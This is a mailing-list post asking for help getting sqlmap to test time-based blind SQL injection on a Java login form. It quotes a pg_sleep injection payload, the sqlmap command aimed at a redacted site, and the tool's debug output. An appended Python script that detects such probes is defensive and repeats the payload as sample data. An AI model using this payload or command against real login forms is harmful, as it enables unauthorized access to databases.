[sqlmap-users] Problems with time based sql inj.
From: David G. <sk...@gm...> - 2010-04-05 20:38:45
I have one site in Java which is only vulnerable to this type of technique (time-based blind sql inj), where all others simply do not work. Theoretically speaking, I have a login form that receives 2 parameters from the user via the POST method, which are the login and password. I've tried several ways to circumvent this form to gain unauthorized access, but I did not get success in the handling of sql injection. However, Nessus reported that the field is vulnerable to Time-Based Sql Injection by manipulating the parameter j_username with the following query:

j_username = ';%20select%20pg_sleep%20(10)--

Having tested the failure, I noticed that you can only make a time-based blind sql injection. But even passing the parameter --time-test to sqlmap, and setting the option timetest in sqlmap.conf to true, does not make sqlmap test time-based sql inj.

# ./sqlmap.py -u "http:/xxxx/xxxx/j_xx_xxx" --data "action=Login&j_password=&j_username=" -p j_username -v 2 --time-test --time-sec 4 --dbms postgresql

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:34:40

[17:34:40] [DEBUG] initializing the configuration
[17:34:40] [DEBUG] initializing the knowledge base
[17:34:40] [DEBUG] cleaning up configuration parameters
[17:34:40] [DEBUG] setting the HTTP timeout
[17:34:40] [DEBUG] setting the HTTP method to GET
[17:34:40] [DEBUG] creating HTTP requests opener object
[17:34:40] [DEBUG] forcing back-end DBMS to user defined value
[17:34:40] [DEBUG] parsing XML queries file
[17:34:40] [INFO] using '/home/skys/sqlmap-dev/output/xxx/session' as session file
[17:34:40] [INFO] testing connection to the target url
sqlmap got a 302 redirect to http://xxx/xxx/index.html;jsessionid=8EF344E0CF2864CF8DCDF23F730E0F57 - What target address do you want to use from now on?
http://xxx:80/xxx/j_xxx_xxx(default) or provide another target address based also on the redirection got from the application
>
[17:34:41] [WARNING] the testable parameter 'j_username' you provided is not into the Cookie
[17:34:41] [INFO] testing if the url is stable, wait a few seconds
[17:34:42] [INFO] url is stable
[17:34:42] [INFO] testing sql injection on POST parameter 'j_username' with 0 parenthesis
[17:34:42] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:42] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:42] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:42] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:42] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 0 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 1 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 1 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 2 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 2 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 3 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 3 parenthesis
[17:34:43] [WARNING] POST parameter 'j_username' is not injectable
[17:34:43] [ERROR] all parameters are not injectable

[*] shutting down at: 17:34:43

# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1536
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 1536
Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010)

--
David Gomes Guimarães
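
For the defending side of the probe quoted in this post, an added example (not part of the original message and not sqlmap code): a Python triage routine that decodes form-encoded login bodies, flags stacked-statement `pg_sleep` probes, and marks those whose response time reached the requested delay. The function names, the verdict labels and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Stacked statement after an optional closing quote, e.g. '; select ...
STACKED = re.compile(r"['\")]?\s*;\s*(select|insert|update|delete|drop|copy)\b", re.I)
# pg_sleep is the call quoted in the post; whitespace before "(" is allowed
# because the reported probe was sent as pg_sleep%20(10).
PG_SLEEP = re.compile(r"\bpg_sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)


def fully_decode(value, max_rounds=3):
    """Undo repeated URL-encoding (%2527 -> %27 -> ') before matching."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def triage(body, elapsed):
    """Classify one form-encoded POST body given its response time in seconds.

    Returns a list of (parameter, verdict). The verdict is 'probe' when a
    delay or stacked statement was only attempted, and 'probe-delayed' when
    the response took at least as long as the requested sleep, which
    suggests the injected statement actually ran.
    """
    findings = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        sleep = PG_SLEEP.search(value)
        if not (sleep or STACKED.search(value)):
            continue
        ran = sleep is not None and elapsed >= float(sleep.group(1))
        findings.append((name, "probe-delayed" if ran else "probe"))
    return findings


# Constructed sample records: (POST body, response time in seconds).
SAMPLES = [
    ("action=Login&j_password=&j_username=';%20select%20pg_sleep%20(10)--", 10.2),
    ("action=Login&j_password=&j_username=%2527%253B%2520select%2520pg_sleep(4)--", 0.1),
    ("action=Login&j_password=secret&j_username=alice", 0.1),
]

if __name__ == "__main__":
    for body, elapsed in SAMPLES:
        print(elapsed, triage(body, elapsed))
```

A 'probe-delayed' verdict on a login parameter is the case worth escalating: it means the query behind the form is built by string concatenation and should be moved to bound parameters.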